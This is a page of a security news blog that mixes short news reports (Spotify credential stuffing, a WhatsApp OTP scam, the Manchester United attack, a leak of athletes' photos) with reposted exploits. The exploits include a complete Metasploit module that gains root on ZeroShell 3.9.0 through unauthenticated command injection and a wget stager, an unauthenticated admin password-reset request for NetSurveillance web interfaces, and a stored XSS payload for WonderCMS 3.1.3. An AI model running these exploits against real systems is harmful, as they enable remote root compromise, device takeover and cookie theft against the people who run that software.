Wednesday, January 15, 2025
Home Blog Page 74

ZeroShell 3.9.0 – ‘cgi-bin/kerbynet’ Remote Root Command Injection

By
Steven Black (n0tst3)
-
0

CVE: 2019-12725

Platform: LINUX

Date: 2020-11-24

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Zeroshell 3.9.0 Remote Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability 
        found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. 
        As sudo is configured to execute /bin/tar without a password (NOPASSWD)
        it is possible to run root commands using the "checkpoint" tar options.
      },
      'Author'         => [
        'Juan Manuel Fernandez', # Vulnerability discovery
        'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module
      ],
      'References'     => [
        ['CVE', '2019-12725'],
        ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'],
        ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py']
      ],
      'DisclosureDate' => 'Jul 17 2019',
      'License'        => MSF_LICENSE,
      'Privileged'     => true, 
      'Platform'       => [ 'unix', 'linux' ],
      'Arch'           => [ ARCH_X86 ],
      'Targets'        => [
       ['Zeroshell 3.9.0 (x86)', {
         'Platform'    => 'linux',
         'Arch'        => ARCH_X86,
        }],
      ],
      'DefaultTarget'  => 0,
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
      ])
  end

  def execute_command(cmd, opts = {})
    command_payload  = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27"

    print_status("Sending stager payload...")

    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/cgi-bin/kerbynet',
      'encode_params' => false,
      'vars_get' => {
        'Action' => 'x509view',
        'Section' => 'NoAuthREQ',
        'User' => '',
        'x509type' => command_payload
      }
    )

    return res
  end

  def filter_bad_chars(cmd)
    cmd.gsub!(/chmod \+x/, 'chmod 777')
    cmd.gsub!(/;/, " %0A ")
    cmd.gsub!(/ /, '+')
    cmd.gsub!(/\//, '%2F')
    return cmd
  end

  def check
    res = execute_command('id')
    if res && res.body.include?("uid=0(root)")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Exploiting...")
    execute_cmdstager(flavor: :wget, delay: 5)
  end

end
Bookmark
Please login to bookmarkClose

PS5 Hacked To Run Original Metal Gear On Internal Web Browser

By
Steven Black (n0tst3)
-
0
The original Metal Gear can be played on PS5
The original Metal Gear can be played on PS5

While the PlayStation 5 boasts a huge catalog of brand new upcoming titles, one player has found a way to access the decades-old classic Metal Gear

PlayStation homebrew developer has managed to run the original Metal Gear through an internal web browser on the PlayStation 5. Metal Gear, the first in the long-running series directed by Hideo Kojima, was released on the MSX2 computer console back in 1987. The game spawned a series of sequels, with the series culminating in the release of 2015’s Metal Gear Solid V: The Phantom Pain. 

With Sony’s PlayStation 5 being available to the public for nearly two weeks for some players, it should be expected that customizations will begin to crop up. Many gamers have begun to apply custom paint jobs to their consoles, giving the stark white design a beautiful splash of unique color. Popular PlayStation titles, such as Marvel’s Spider-Man, have been payed homage through custom paintjobs. One particularly impressive customization came in the form of a Mass Effect-inspired design, adorning the PS5 with the colors and insignia of the sci-fi saga’s N7 operatives.

Other players are tinkering with the PS5 hardware itself instead of its case. Twitter user psxdev has managed to get the original Metal Gear to run on a PlayStation 5, using an online MSX2 emulator. WebMSX was made to run on the new console thanks to an internal web browser that is not ordinarily accessible, but can be used through a back door. The emulator is available on most common web browsers, making it simple to access through the PS5.

The presence of a hidden web browser on the PlayStation 5 was reported shortly after the console’s release, and it is apparently still accessible. There exists an option to link the PS5 to other online services, such as Twitter, and choosing this option begins connecting the user to Twitter.

However, canceling the log-in will allow free access to the entire internet, allowing access to unintended services such as WebMSX. This discovery came shortly after Sony reported that the console would not be sporting a web browser, despite the fact that the PS3 and PS4 both included one.

With the recent launch of a new generation of consoles, it should be expected that gamers will begin exploring the new hardware and software at their fingertips. It is always cool to see technology used for unintended purposes, and one never needs and excuse to play some Metal Gear. As more and more people get their hands on Xbox Series X/S and PlayStation 5, it seems likely that more and more exploits will be discovered.

Bookmark
Please login to bookmarkClose

Spotify Accounts Hacked by Credential Stuffing Based on Stolen Database

By
Steven Black (n0tst3)
-
0
spotify 768x432 1
spotify 768x432 1

A database of 300 million records was being used for compromising 300,000 to 350,000 Spotify accounts.

While this database’s origin was unknown yet, hackers have been using it for accessing Spotify accounts and selling them to others. It was reported to Spotify in July, and it did a rolling reset to all affected accounts.

Credential Stuffing Attack on Spotify

Spotify is the largest music platform by userbase, which is having users from around the world. It’s so popular that potential users are interested in paying for a lesser price if a subscription is available.

Thus, catching that demand, hackers have been breaching the Spotify accounts and reselling them to interested customers for profit.

One such incident has been happening this year, and VPNMentor’s report throws light on how that’s happening.

The researchers mentioned that a database containing over 300 million users’ records (has username passwords, e-mail addresses, etc.) was being used by hackers to credential stuff on Spotify accounts.

Credential Stuffing is a technique where attackers use a list of usernames and passwords to try them matching on other online accounts of a targeted user.

This is based on the hope that the victim should be using common login credentials for his other online accounts. Thus, they can breach and takeover such matching accounts.

The list for trying out here could be obtained from previous hacks and data breaches. And this could be the same case in Spotify’s too. VPNMentor said that a database of 300 million records was being used for compromising 300,000 to 350,000 Spotify accounts.

This was reported to Spotify in July this year and received a reply on the same day as “In response to our inquiry, Spotify initiated a ‘rolling reset’ of passwords for all users affected. As a result, the information on the database would be voided and become useless.” Yet, Spotify users are recommended to reset/change their passwords for strong and unused ones for better security.

Bookmark
Please login to bookmarkClose

WhatsApp OTP Scam: Save your personal, bank details from getting hacked

By
Steven Black (n0tst3)
-
0
WhatsApp scam alert 933421
WhatsApp scam alert 933421
WhatsApp OTP Scam: Save your personal media, bank account details from getting hacked by using these methods
The WhatsApp OTP scam is posing as a bigger threat as recently, the instant-messaging app got the green signal for its UPI-based payments facility from the NPCI, which also uses the OTPs for transactions.

With the increase in usage of social media platforms and digital payment methods, the hackers are founding new ways to attack the users and steal their hard-earned money and their private data. Now a new scam, known as WhatsApp OTP scam, has come to the light and this time the scammers have made the instant-messaging app WhatsApp as their ladder to your bank accounts.

The WhatsApp OTP scam is posing as a bigger threat as recently, the instant-messaging app got the green signal for its UPI-based payments facility from the NPCI, which also uses the OTPs for transactions. In view of this, if your WhatsApp account gets compromised, then not just the data, hackers are likely to get hold of your bank account details.

So, here we are going to know about the latest WhatsApp OTP scam and how you can avoid getting duped.

How does the WhatsApp OTP scam work?

In the WhatsApp OTP scam, the scamsters will contact you via SMS, pretending to be your friend or relative. The fraudster may even try to get your attention by describing some kind of emergency. After gaining your trust, the scammer will ask you for an OTP, which he will claim to be an accidental forward on your number.

Once you shared the OTP, you will be logged out of your WhatsApp account and the hacker will get full access to your messages, contacts and your personal media. The hacker can also send messages to your friends and relatives and can also ask for monetary help from them. The chain of the event gets multiplied once the scammer hacks into your account.

How to avoid getting duped?

If you mistakenly forwarded the OTP to the scammer, you should immediately reset your WhatsApp account and log in again. The rule of thumb to prevent these type of frauds is to never share any information without confirming if the message is genuine. You can also avoid this fraud by activating the two-factor authentication on the app to increase the account’s security.

Bookmark
Please login to bookmarkClose

EU security blunder as ‘secret’ defence ministers call hacked and ..

By
Steven Black (n0tst3)
-
0
Flag EU
Flag EU

A so-called ‘SECRET’ virtual call of EU defence ministers descended into chaos after a Dutch journalist managed to hack into the conference, prompting many members to burst out into laughter.

A confidential consultation between European Union Defence ministers was the victim of a hack. Journalist Daniel Verlaan from RTL News had managed to join the virtual meeting after guessing the password. This was possible because the Twitter account of Dutch Minister Ank Bijleveld briefly contained a photo with the login address and part of the pin code.

In footage taken, Mr Verlaan appears shocked as he realises he has actually made it onto the call.

He waves at the participants, causing many people to laugh.

The EU’s Minister for Foreign Affairs Josep Borrell jokingly asks: “How are you?”

The journalist replied: “I’m fine, how are you?”

Mr Borrell told him: “You know that you have been jumping into a secret conference?”

Mr Verlaan said: “Yes, yes. I’m sorry. I’m a journalist from the Netherlands.

“I’m sorry for interrupting your conference. I’ll be leaving here.”

The EU official added: “You know it’s a criminal offence, huh? You’d better set off quickly before the police arrives.”

The Dutch tech reporter decided to sign off then, saying “bye bye” to the conference before exiting the call.

Throughout the exchange, laughter can be heard coming from a lot of participants.

Mr Borrell apologises to the members even as many appear amused at the situation.

Bookmark
Please login to bookmarkClose

Netsuveillancewebcookie Web interface password change

By
Steven Black (n0tst3)
-
0
download 1
download 1
# Exploit Title: NetSurveillance Web interface password change
# Exploit Author: AsCiI
# Vendor Homepage: 
# Software Link: 
# Version: V4.02.R11.00000140.10001.131900.00000 maybe other
# Tested on: V4.02.R11.00000140.10001.131900.00000 Build 
# CVE : 
 
NetSurveillance Web interface password can be changed when 
there is no default question set, the answer will be empty
Tested on System: V4.02.R11.00000140.10001.131900.00000

 
 
POST /result.html?cLanguage=null HTTP/1.1
Host: [Host_Name]
Referer: http://[Host_Name]/reminder.html
Content-Type: application/x-www-form-urlencoded
Cookie: NetSuveillanceWebCookie=%7B%22username%22%3A%22admin%22%7D
Unlockquestion1=Please+select+Question&Unlockanswer1=&Unlockquestion2=Please+select+Question&Unlockanswer2=&password=000000&confirpossword=000000
Bookmark
Please login to bookmarkClose

Police probe Manchester United cyber attack

By
RiSec.Mitch
-
1
dims
dims

Police say they are investigating a cyber attack against Manchester United.

The club confirmed the hacking on Friday evening and said it was “not currently aware of any breach of personal data associated with our fans and customers”.

On Saturday, a Greater Manchester Police spokeswoman said: “We are aware and currently investigating a cyber-related incident at Manchester United Football Club.”

A club statement read: “Manchester United can confirm that the club has experienced a cyber attack on our systems.

“The club has taken swift action to contain the attack and is currently working with expert advisers to investigate the incident and minimise the ongoing IT disruption.

“Although this is a sophisticated operation by organised cyber criminals, the club has extensive protocols and procedures in place for such an event and had rehearsed for this eventuality.

“Our cyber defences identified the attack and shut down affected systems to contain the damage and protect data.

“Club media channels, including our website and app, are unaffected and we are not currently aware of any breach of personal data associated with our fans and customers.

“We are confident that all critical systems required for matches to take place at Old Trafford remain secure and operational and that tomorrow’s (Saturday) game against West Bromwich Albion will go ahead.”

A spokesman for United added: “These type of attacks are becoming more and more common and are something you have to rehearse for.”

United have informed the Information Commissioner’s Office, as required, and the club say forensic tracing is being carried out in a bid to establish further detail about the attack.

Meanwhile, We earlier reported, on Saturday that four British athletes were among “hundreds” of female sports stars and celebrities whose intimate photographs and videos were posted online in a separate attack.

Mobile phones were targeted as one UK athlete had nearly 100 private images stolen and another had more than 30 pictures and video clips taken, added the newspapers.

Bookmark
Please login to bookmarkClose

Female athletes hacked in ‘reprehensible’ naked photo leak

By
RiSec.Mitch
-
0
52b995d0 2c42 11eb bd3e 3de89f583440
52b995d0 2c42 11eb bd3e 3de89f583440

Hundreds of female sports stars and celebrities have had naked photos and videos stolen and leaked online in a ‘reprehensible’ cyber attack.

On the same night as Manchester United were hacked by ‘organised criminals’, four British athletes had their explicit content stolen from their phones and posted online.

The unnamed athletes are now considering their next move in an attempt to have the photos and videos removed from the internet.

“It really is difficult to know what to do next,” an agent of one of the athletes told The Times.

“The people who do this are sick.

“We have seen some very unpleasant cases, even where people have been blackmailed over [stolen] material.

“But it’s not easy to get a grip on the situation and go after them.

“It can take years to pursue, just to get it taken down from the internet. As a victim you have to decide if you want to go through it.”

One of the athletes reportedly had about 100 images stolen, while another had more than 30 pictures and videos leaked.

A spokesperson for the National Cyber Security Centre in the UK said the attack was “utterly reprehensible”.

“Accessing and then leaked people’s personal data is utterly reprehensible, and we would urge everyone to take steps to secure their online accounts,” they said.

“The NCSC recommends people turn on two-factor authentication where it’s available.

“We also recommend a strong password made up of three random words to reduce the likelihood of being hacked, and important accounts should use a unique password.

“The NCSC’s Cyber Aware website has actionable steps to stay secure.”

Bookmark
Please login to bookmarkClose

Cybersecurity expert urges Vatican to strengthen internet defences

By
Steven Black (n0tst3)
-
0
cq5dam.thumbnail.cropped.750.422
cq5dam.thumbnail.cropped.750.422

A cyber security expert has urged the Vatican to take immediate action to strengthen its defenses against hackers.

Andrew Jenkinson, group CEO of Cybersec Innovation Partners (CIP) in London, said that he had contacted the Vatican in July to express concern about its vulnerability to cyber attacks.

He said that to date he had received no response, despite making several further attempts to raise the issue with the appropriate Vatican office.

The British cyber security consultancy approached the Vatican following reports in July that suspected Chinese state-sponsored hackers had targeted Vatican computer networks. CIP offered its services to address the vulnerabilities.

In a July 31 email to the Gendarmerie Corps of Vatican City State, Jenkinson suggested that the breach might have occurred through one of the Vatican’s many subdomains. 

Vatican City has a sprawling system of websites administered by the Internet Office of the Holy See and organized under the country code top-level domain “.va”. The Vatican’s web presence has expanded steadily since its launched its main website, www.vatican.va, in 1995. 

Jenkinson sent follow-up emails in August and October, emphasizing the urgency of tackling weaknesses in the Vatican’s cyber defenses. He noted that www.vatican.va remained “not secure” months after the breach was reported. He also sought to contact the Vatican through intermediaries.

The Gendarmerie Corps confirmed Nov. 14 that it had received the information sent by Jenkinson. Its command office told CNA that his concerns “have been duly taken into consideration and transmitted, as far as their competence is concerned, to the offices that manage the website in question.”

A report, released July 28, said that hackers had breached Vatican websites in an attempt to give China an advantage in negotiations to renew a provisional deal with the Holy See.  

Researchers said they had uncovered “a cyberespionage campaign attributed to a suspected Chinese state-sponsored threat activity group,” which they referred to as RedDelta.

The study was compiled by the Insikt Group, the research arm of the U.S.-based cybersecurity company Recorded Future. 

In a follow-up analysis, published Sept. 15, the Insikt Group said that hackers had continued to focus on the Vatican and other Catholic organizations even after their activities were publicized in July.

It noted that RedDelta ceased its activities immediately after the publication of its initial report. 

“However, this was short-lived, and within 10 days, the group returned to its targeting of the Hong Kong Catholic Diocese mail server, and within 14 days, a Vatican mail server,” it said.––CNA

Bookmark
Please login to bookmarkClose

WonderCMS 3.1.3 – ‘content’ Persistent Cross-Site Scripting

By
Steven Black (n0tst3)
-
0
OpenSourceCMS100article
OpenSourceCMS100article
# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.wondercms.com/
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux

Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Attack vector:
This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.

Vulnerable Parameters: Page description.

Steps-To-Reproduce:
1. Go to the Simple website builder.
2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.

POST /demo/ HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 196
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/demo/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925

fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
Bookmark
Please login to bookmarkClose
1...737475...79Page 74 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.